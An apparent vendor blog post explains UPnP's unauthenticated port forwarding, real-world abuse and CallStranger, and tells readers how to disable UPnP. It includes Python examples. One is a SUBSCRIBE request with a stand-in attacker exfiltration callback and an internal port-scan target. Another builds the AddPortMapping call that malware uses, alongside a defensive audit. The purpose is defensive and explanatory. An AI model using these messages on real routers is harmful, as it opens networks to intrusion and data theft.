
What Is UPnP and Why Should You Disable It?

What UPnP Does

Universal Plug and Play (UPnP) is a set of networking protocols that allows devices on a local network to discover each other and establish communication automatically. It handles device discovery (via SSDP), device description (via XML), service control (via SOAP), and event notification.

The most security-relevant feature of UPnP is its ability to modify router configuration automatically. A device on your LAN can ask your router to open ports, create port forwarding rules, and modify firewall settings - all without any user interaction or authentication.

UPnP was designed in the late 1990s by Microsoft and other companies in the UPnP Forum. The goal was zero-configuration networking: plug a device in, and it works. That goal was achieved. Authentication and authorization were left out of the design: the protocol trusts every host on the LAN, and that trust is the root of every problem described below.

Automatic Port Forwarding

The Internet Gateway Device (IGD) profile is the UPnP device type that controls port forwarding on routers. Its WANIPConnection (or WANPPPConnection) service exposes an AddPortMapping action: a device on the LAN sends it as an HTTP/SOAP request to the router's control URL, and the router creates a mapping that forwards traffic from a specified external port to an internal IP address and port. A lease duration of zero makes the mapping permanent.

graph TD
    subgraph "UPnP Port Forwarding Flow"
        APP[Application on LAN] -->|SSDP Discovery| ROUTER[Router with UPnP]
        APP -->|AddPortMapping SOAP request| ROUTER
        ROUTER -->|Opens external port 8080| WAN[Internet - WAN Interface]
        WAN -->|Traffic on port 8080| ROUTER
        ROUTER -->|Forwards to 192.168.1.50:8080| APP
    end
    subgraph "No Authentication Required"
        ANY[Any device on LAN] -->|Can request port mappings| ROUTER2[Router]
        ROUTER2 -->|Opens ports without user approval| OPEN[Firewall holes created]
    end

Any device on the LAN can open ports on the router - no password or user approval needed

The request carries no credential. There is no password, no approval prompt, no notification to the user. The router simply does what it is told. This is by design - UPnP was built to work without user intervention. Some router firmware offers a "secure mode" that only lets a client map ports to its own IP address, but it is optional, off on many devices, and does nothing to stop a compromised host from exposing itself.

Why UPnP Exists

Before UPnP, any application that needed to receive inbound connections from the internet required manual port forwarding. Users had to log into their router's admin panel, find the port forwarding section, create a rule with the correct internal IP, internal port, external port, and protocol. Most home users could not do this.

Gaming consoles need inbound connections for multiplayer lobbies. BitTorrent clients need inbound connections for peer-to-peer transfers. VoIP applications need open ports for incoming calls. Smart home devices need ports for remote access. Video conferencing tools sometimes need direct connections.

UPnP solved this by letting applications configure the router themselves. Plug in your Xbox, and it automatically opens the ports it needs. Install a torrent client, and it configures port forwarding on its own. The user experience improved dramatically.

The Security Problem

The convenience of automatic port forwarding is also its danger. Any software running on any device on your LAN can open any port on your router. This includes malware.

If a single device on your network is compromised - a laptop with a trojan, a smart camera with a vulnerability, an IoT device running outdated firmware - the malware can use UPnP to open ports on your router. It can expose internal services to the internet, create backdoor access for command-and-control servers, or open RDP (Remote Desktop Protocol) to allow remote attackers direct access to machines on your network.

The attack does not require compromising the router. The router is doing exactly what UPnP tells it to do. Only one device inside the LAN needs to be compromised.

graph TD
    subgraph "UPnP Malware Attack Chain"
        M1[Malware infects IoT device] --> M2[Malware discovers router via SSDP]
        M2 --> M3[Malware sends AddPortMapping]
        M3 --> M4[Router opens port 3389 to IoT device]
        M4 --> M5[Malware sets up RDP proxy]
        M5 --> M6[Attacker connects from internet]
        M6 --> M7[Full access to internal network]
    end

Malware on any LAN device can open router ports via UPnP - creating remote access for attackers

Documented Attacks

UPnP abuse is not theoretical. It has been documented repeatedly in real-world attacks.

Fiesta Exploit Kit (2014-2015): Malware delivered through the Fiesta exploit kit used UPnP to open RDP ports on victims' routers, giving attackers remote desktop access to internal machines. The malware did not need to exploit the router itself - it simply used UPnP as designed.

Pinkslipbot/QakBot (2017): This banking trojan used UPnP to turn infected machines into proxy servers. It opened ports on the router to allow other infected machines to relay command-and-control traffic through the victim's network. The router facilitated the botnet infrastructure without being compromised.

UPnProxy (2018): Akamai researchers found attackers injecting NAT entries into routers from the internet. The affected routers exposed their UPnP SOAP control endpoints on the WAN interface and accepted AddPortMapping requests whose "internal" client was an arbitrary internet address, so no foothold on the LAN was needed. Akamai counted about 4.8 million devices answering SSDP from the internet, 765,000 with reachable control endpoints, and over 65,000 already carrying injected mappings that proxied traffic for spam campaigns, ad fraud and other abuse. A later wave, which Akamai named EternalSilence, used the same technique to expose SMB (TCP 139 and 445) on roughly 45,000 routers.

CallStranger - CVE-2020-12695

CallStranger is a vulnerability in UPnP eventing (GENA). A control point subscribes to a service's events with a SUBSCRIBE request whose CALLBACK header lists the URLs to notify, and the device then sends an HTTP NOTIFY to each of them whenever the service's state changes. The specification placed no restriction on those URLs, so an attacker who can reach a device's event endpoint (from the internet if the device exposes UPnP on its WAN side, or from a compromised host on the LAN) can name any URL, including one outside the network, and the device will send traffic to it.

This yields three attacks: data exfiltration (the device carries attacker-chosen data out through the firewall in its callbacks, bypassing egress filtering and DLP), DDoS amplification (many devices flooding a victim URL with NOTIFY requests), and port scanning (the callbacks can name internal addresses and ports, so the device probes the network on the attacker's behalf).

CallStranger was a flaw in the UPnP specification itself rather than in one vendor's implementation, so every device built to the specification was affected; the researcher who reported it estimated billions of devices. The Open Connectivity Foundation, which maintains UPnP today, updated the specification on 17 April 2020 to require that devices reject callback URLs outside their local network. Devices built to the older text remain affected until their firmware is updated, and many never will be.
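
A minimal subscription handler as an added example (not code from this article or from the CallStranger advisory): it parses a GENA SUBSCRIBE, extracts the CALLBACK URLs and shows the pre-2020 behaviour, where every URL becomes a NOTIFY target, beside a hardened check that accepts only callbacks pointing at the subscriber's own LAN address. The hardened rule is stricter than the 2020 specification update, which only requires the callback to be on the device's own network. The request, addresses and port numbers are constructed.

```python
"""Added example, not from the article or the CallStranger advisory: a GENA SUBSCRIBE handler's
callback check, pre-2020 behaviour beside a hardened one.  Request and addresses are constructed."""
import ipaddress
from urllib.parse import urlparse

# Constructed SUBSCRIBE as an attacker would send it: one callback at the attacker's server
# (exfiltration / DDoS), one at another LAN host's SSH port (port scan), one the subscriber
# at 192.168.1.7 legitimately wants.
SAMPLE_SUBSCRIBE = (b"SUBSCRIBE /evt/IPConn HTTP/1.1\r\n"
                    b"HOST: 192.168.1.1:5000\r\n"
                    b"CALLBACK: <http://203.0.113.9/collect?x=AAAA>,<http://192.168.1.20:22/>,"
                    b"<http://192.168.1.7:49152/events>\r\n"
                    b"NT: upnp:event\r\n"
                    b"TIMEOUT: Second-1800\r\n\r\n")

def parse_subscribe(raw: bytes) -> dict:
    """Method, path and lower-cased headers of a GENA request (plain HTTP framing, CRLF-delimited)."""
    head = raw.decode(errors="replace").split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}

def parse_callbacks(header: str) -> list:
    """CALLBACK carries one or more <URL> tokens; the spec puts no limit on how many."""
    return [part.split(">", 1)[0] for part in header.split("<")[1:] if ">" in part]

def callbacks_pre_2020(urls: list) -> list:
    """What a device built to the original spec does: NOTIFY every URL it was handed."""
    return list(urls)

def callbacks_hardened(urls: list, peer_ip: str, lan_subnet: str, max_callbacks: int = 1) -> list:
    """Keep only http callbacks whose host is the subscriber's own address inside the LAN
    (stricter than the 2020 spec update, which only demands 'same network'), capped in number."""
    kept = []
    lan = ipaddress.ip_network(lan_subnet)
    for url in urls:
        u = urlparse(url)
        try:
            host = ipaddress.ip_address(u.hostname or "")
        except ValueError:
            continue  # hostnames are refused outright: no DNS lookups, no rebinding games
        if u.scheme == "http" and host in lan and str(host) == peer_ip:
            kept.append(url)
    return kept[:max_callbacks]

def handle_subscribe(raw: bytes, peer_ip: str, lan_subnet: str, hardened: bool) -> dict:
    """Which NOTIFY targets a SUBSCRIBE yields; accepted=False is where GENA answers 412."""
    req = parse_subscribe(raw)
    if req["method"] != "SUBSCRIBE" or req["headers"].get("nt") != "upnp:event":
        return {"accepted": False, "targets": []}
    urls = parse_callbacks(req["headers"].get("callback", ""))
    targets = callbacks_hardened(urls, peer_ip, lan_subnet) if hardened else callbacks_pre_2020(urls)
    return {"accepted": bool(targets), "targets": targets}
```

Run with `hardened=False` the device would NOTIFY all three URLs, including the attacker's server and the neighbour's SSH port; with `hardened=True` only the subscriber's own endpoint survives, and a SUBSCRIBE offering nothing but off-LAN callbacks is refused.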

How to Disable UPnP

Disabling UPnP is straightforward on most routers. Log into your router's admin panel (typically at 192.168.1.1 or 192.168.0.1), find the UPnP setting (usually under Advanced, NAT, or Firewall settings), and turn it off.

Common locations by router brand:

  • Netgear: Advanced > Advanced Setup > UPnP
  • TP-Link: Advanced > NAT Forwarding > UPnP
  • Asus: WAN > Connection > Enable UPnP
  • Linksys: Connectivity > UPnP

After disabling, check that port mappings previously created through UPnP were also removed; some routers keep them. Look at the router's port forwarding or NAT table and delete anything you did not create yourself. Then verify from outside: a scan of your public address from the internet should show none of those ports open, and UDP 1900 (SSDP) and the router's UPnP control port should not answer from the WAN at all, since WAN-exposed UPnP is exactly what UPnProxy abused.
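
The exchange described under Automatic Port Forwarding and the audit just described, as an added example (not code from this article or from any router vendor): it builds the SSDP probe and the unauthenticated AddPortMapping SOAP call a LAN client sends, walks a router's mapping table with GetGenericPortMappingEntry, and flags entries that expose high-risk services or point at an "internal" client outside the LAN. The router control URL, the LAN subnet and the router replies are constructed for the offline demo.

```python
"""Added example, not code from the article: the IGD messages a LAN client (or malware) sends, and an
audit of the mappings a router still holds.  Stdlib only; router URL, LAN subnet and replies are constructed."""
import ipaddress
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

SSDP_HOST, SSDP_PORT = "239.255.255.250", 1900
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
HIGH_RISK_PORTS = {22, 23, 445, 3389, 5900}  # SSH, Telnet, SMB, RDP, VNC

def msearch_request(st=IGD_ST, mx=2) -> bytes:
    """Multicast discovery probe; a router running UPnP answers with a LOCATION header."""
    return (f"M-SEARCH * HTTP/1.1\r\nHOST: {SSDP_HOST}:{SSDP_PORT}\r\n"
            f'MAN: "ssdp:discover"\r\nMX: {mx}\r\nST: {st}\r\n\r\n').encode()

def soap_request(action: str, args: dict, service: str = WANIP):
    """Headers and body of an IGD control call.  Note the absence of any credential."""
    fields = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    body = (f'<?xml version="1.0"?><s:Envelope xmlns:s="{SOAP_NS}" s:encodingStyle="http://schemas.'
            f'xmlsoap.org/soap/encoding/"><s:Body><u:{action} xmlns:u="{service}">{fields}</u:{action}>'
            "</s:Body></s:Envelope>")
    return {"Content-Type": 'text/xml; charset="utf-8"', "SOAPAction": f'"{service}#{action}"'}, body.encode()

def add_port_mapping(ext_port, internal_ip, int_port, proto="TCP", desc="example", lease=0):
    """The one message that punches a hole in the router; NewLeaseDuration 0 means permanent."""
    return soap_request("AddPortMapping", {
        "NewRemoteHost": "", "NewExternalPort": ext_port, "NewProtocol": proto, "NewInternalPort": int_port,
        "NewInternalClient": internal_ip, "NewEnabled": 1, "NewPortMappingDescription": desc,
        "NewLeaseDuration": lease})

def parse_mapping_entry(xml_bytes: bytes):
    """New* fields of a GetGenericPortMappingEntryResponse; None on UPnP error 713 (end of table)."""
    local = lambda tag: tag.rsplit("}", 1)[-1]  # strip the XML namespace
    for el in ET.fromstring(xml_bytes).iter():
        if local(el.tag) == "errorCode":
            if (el.text or "").strip() == "713":  # SpecifiedArrayIndexInvalid
                return None
            raise RuntimeError(f"UPnP error {el.text}")
        if local(el.tag) == "GetGenericPortMappingEntryResponse":
            return {local(c.tag): (c.text or "").strip() for c in el}
    raise ValueError("not a GetGenericPortMappingEntry response")

def http_post(url: str, headers: dict, body: bytes) -> bytes:
    """Live transport; SOAP faults arrive as HTTP 500, so return that body instead of raising."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        return urllib.request.urlopen(req, timeout=5).read()
    except urllib.error.HTTPError as err:
        return err.read()

def enumerate_mappings(control_url: str, post=http_post) -> list:
    """Walk the router's mapping table by index until it answers 713."""
    mappings = []
    for index in range(1024):  # sanity cap
        headers, body = soap_request("GetGenericPortMappingEntry", {"NewPortMappingIndex": index})
        entry = parse_mapping_entry(post(control_url, headers, body))
        if entry is None:
            break
        mappings.append(entry)
    return mappings

def risk_flags(entry: dict, lan_subnet: str) -> list:
    """Reasons to look twice: a high-risk service exposed, or a client that is not on the LAN (UPnProxy)."""
    flags = []
    if {int(entry.get(k) or 0) for k in ("NewExternalPort", "NewInternalPort")} & HIGH_RISK_PORTS:
        flags.append("high-risk service exposed")
    try:
        if ipaddress.ip_address(entry.get("NewInternalClient", "")) not in ipaddress.ip_network(lan_subnet):
            flags.append("internal client outside LAN (UPnProxy pattern)")
    except ValueError:
        flags.append("unparsable internal client")
    return flags

def entry_xml(ext, proto, internal, client, desc) -> bytes:  # one constructed router reply
    return (f'<?xml version="1.0"?><s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
            f'<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP}"><NewRemoteHost></NewRemoteHost>'
            f"<NewExternalPort>{ext}</NewExternalPort><NewProtocol>{proto}</NewProtocol><NewInternalPort>"
            f"{internal}</NewInternalPort><NewInternalClient>{client}</NewInternalClient><NewEnabled>1"
            f"</NewEnabled><NewPortMappingDescription>{desc}</NewPortMappingDescription><NewLeaseDuration>0"
            "</NewLeaseDuration></u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>").encode()

SAMPLE_ENTRIES = [entry_xml(3074, "UDP", 3074, "192.168.1.20", "Xbox"),  # constructed: a console mapping,
                  entry_xml(3389, "TCP", 3389, "192.168.1.50", "rdp"),  # an RDP hole,
                  entry_xml(8080, "TCP", 445, "203.0.113.9", "proxy")]  # and a UPnProxy-style injected entry
SAMPLE_FAULT = (f'<?xml version="1.0"?><s:Envelope xmlns:s="{SOAP_NS}"><s:Body><s:Fault><faultcode>s:Client'
                '</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:'
                'control-1-0"><errorCode>713</errorCode><errorDescription>SpecifiedArrayIndexInvalid'
                "</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>").encode()

def demo_router(url, headers, body):  # stand-in for http_post, backed by the constructed table
    index = int(body.split(b"<NewPortMappingIndex>")[1].split(b"<")[0])
    return SAMPLE_ENTRIES[index] if index < len(SAMPLE_ENTRIES) else SAMPLE_FAULT

def demo_audit(lan_subnet="192.168.1.0/24") -> list:  # (entry, flags) for each flagged constructed mapping
    found = enumerate_mappings("http://192.168.1.1:5000/ctl/IPConn", demo_router)
    return [(m, f) for m in found if (f := risk_flags(m, lan_subnet))]
```

Against a real router, pass `http_post` instead of `demo_router` and the controlURL of the WANIPConnection service, taken from the description document advertised in the LOCATION header of the SSDP reply to `msearch_request()` (send it over UDP to 239.255.255.250:1900). If UPnP is genuinely off, nothing on the LAN answers that M-SEARCH at all, and the mapping table should come back empty.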

What Breaks When You Disable It

Some applications and devices rely on UPnP for port forwarding. When you disable it, these applications cannot automatically open ports and may experience reduced functionality.

Gaming consoles may report "NAT type: strict" and have trouble connecting to multiplayer lobbies. Fix this by manually forwarding the ports the console's vendor documents. Putting the console in the router's DMZ also works, but it forwards every unsolicited inbound packet to the console, which is the opposite of what you set out to achieve; treat it as a last resort.

BitTorrent clients may not be reachable by other peers, reducing download speeds. Manual port forwarding fixes this.

VoIP applications may have trouble with incoming calls if they rely on UPnP for NAT traversal. Most modern VoIP services use STUN/TURN servers instead and do not need UPnP.

Smart home remote access may stop working if the device used UPnP to expose itself. Most smart home platforms now use cloud relay connections instead, which do not require UPnP.

The Verdict

Disable UPnP. The security risk of allowing any device on your network to open arbitrary firewall ports without authentication far outweighs the convenience of automatic port forwarding. Manually forward the specific ports you need for specific applications.

The few minutes spent configuring manual port forwarding are worth the protection against malware that could otherwise punch holes through your firewall at will.

Securing your network starts with understanding what protocols and services are running on it. The BLEShark Nano helps you discover wireless devices on your network, giving you the visibility needed to audit your environment and identify devices that might be using UPnP to modify your router's configuration.
